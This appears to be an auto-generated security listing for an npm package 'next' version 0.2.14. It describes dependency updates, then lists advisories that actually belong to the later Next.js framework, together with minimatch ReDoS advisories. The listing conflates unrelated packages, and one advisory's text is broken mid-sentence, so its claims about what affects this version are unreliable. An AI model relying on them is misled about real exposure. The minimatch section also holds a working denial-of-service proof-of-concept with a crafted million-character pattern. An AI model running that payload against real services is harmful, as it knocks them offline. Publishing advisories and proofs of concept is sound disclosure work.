Next.js version 0.2.14 represents an incremental update to the Node.js extensions library, building upon the foundation laid by version 0.2.13. For developers, the primary allure of this package lies in its aim to provide useful utilities and extensions that streamline Node.js development. The key differentiators between versions 0.2.13 and 0.2.14 are primarily dependency updates. Version 0.2.14 showcases several dependency upgrades, namely, "es5-ext" moving from version 0.7.x to 0.8.x, "deferred" shifting from 0.4.x to 0.5.x, and "minimatch" evolving from 0.1.x to 0.2.x.
These dependency enhancements are important because they potentially bring performance improvements, bug fixes, and new features from the underlying libraries. Developers relying on these core dependencies should benefit from enhanced stability and up-to-date functionalities. While the "devDependencies" and other core metadata, like the author and repository, remain consistent, the refreshed dependencies signal an effort to maintain a current and robust library, encouraging adoption by developers wanting a reliable base for their Node.js projects. The release date confirms a relatively short period between the two versions, indicating active maintenance and a dedication to keeping the library current with its dependencies.
All the vulnerabilities related to the version 0.2.14 of the package
Directory Traversal in Next.js
serverless targetnext exportWe recommend everyone to upgrade regardless of whether you can reproduce the issue or not.
https://github.com/zeit/next.js/releases/tag/v9.3.2
https://github.com/zeit/next.js/releases/tag/v9.3.2
Next.js Race Condition to Cache Poisoning
Summary
We received a responsible disclosure from Allam Rachid (zhero) for a low-severity race-condition vulnerability in Next.js. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve pageProps data instead of standard HTML.
Credit
Thank you to Allam Rachid (zhero) for the responsible disclosure. This research was rewarded as part of our bug bounty program.
Next.js Content Injection Vulnerability for Image Optimization
A vulnerability in Next.js Image Optimization has been fixed in v15.4.5 and v14.2.31. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery.
All users relying on images.domains or images.remotePatterns are encouraged to upgrade and verify that external image sources are strictly validated.
More details at Vercel Changelog
Next.js Improper Middleware Redirect Handling Leads to SSRF
A vulnerability in Next.js Middleware has been fixed in v14.2.32 and v15.4.7. The issue occurred when request headers were directly passed into NextResponse.next(). In self-hosted applications, this could allow Server-Side Request Forgery (SSRF) if certain sensitive headers from the incoming request were reflected back into the response.
All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.
More details at Vercel Changelog
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.